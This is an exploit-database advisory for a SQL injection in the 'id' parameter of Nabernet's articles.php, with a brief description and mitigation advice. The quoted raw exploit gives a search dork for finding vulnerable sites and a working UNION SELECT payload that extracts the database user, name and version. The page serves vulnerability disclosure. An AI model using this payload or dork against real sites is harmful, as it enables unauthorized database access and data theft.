Nabernet (articles.php) Sql Injection Vulnerability

vendor:

articles.php

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

Sql Injection

CWE

Product Name: articles.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Nabernet (articles.php) Sql Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'id' in the 'articles.php' page. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

Nabernet (articles.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "powered by Nabernet"

####################################################################

===[ Exploit ]===

www.site.com/articles.php?id=null[Sql]

www.site.com/articles.php?id=null'+and+1=2+union+select+null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,null,null,null,null,null,null-- -


####################################################################